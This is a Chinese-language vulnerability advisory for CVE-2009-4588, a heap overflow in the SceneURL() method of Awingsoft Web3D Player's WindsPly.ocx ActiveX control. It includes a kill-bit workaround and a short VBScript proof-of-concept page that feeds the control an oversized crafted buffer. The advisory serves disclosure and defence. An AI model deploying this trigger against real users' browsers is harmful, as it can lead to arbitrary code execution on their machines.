安全研究
安全漏洞
Web3D Player WindsPly.ocx控件SceneURL()方式堆溢出漏洞
发布日期:2009-07-09
更新日期:2010-01-08
受影响系统:Awingsoft Web3D Player <= 3.5.0.0
描述:
CVE ID:
CVE-2009-4588
Awakening是一个功能强大的实时3D解决方案,Web3D Player是用于播放3D电影的浏览器插件。
Web3D Player ActiveX控件(WindsPly.ocx)没有正确地验证提供给SceneURL()调用的参数,用户受骗访问了恶意网页并向该方式提交了超长参数就可以触发堆溢出,导致执行任意指令。
<*来源:shinnai (
shinnai@autistici.org)
链接:
http://secunia.com/advisories/35764
http://www.milw0rm.com/exploits/9116
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<object classid='clsid:17A54E7D-A9D4-11D8-9552-00E04CB09903' id='test'></object>
<script language='vbscript'>
buff = String(8704, "A")
mReg = unescape("bbbb")
mExc = unescape("%00%00%01%00") 'Memory address: 00010000 Access: RW
buf1 = String(88, "c")
buf2 = String(47284, "D")
test.SceneURL = buff + mReg + mExc + buf1 + buf2
</script>
建议:
临时解决方法:
* 为clsid 17A54E7D-A9D4-11D8-9552-00E04CB09903设置kill-bit。
厂商补丁:
Awingsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.awingsoft.com/web3d/web3d.htm浏览次数:2963
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载 绿盟科技给您安全的保障 |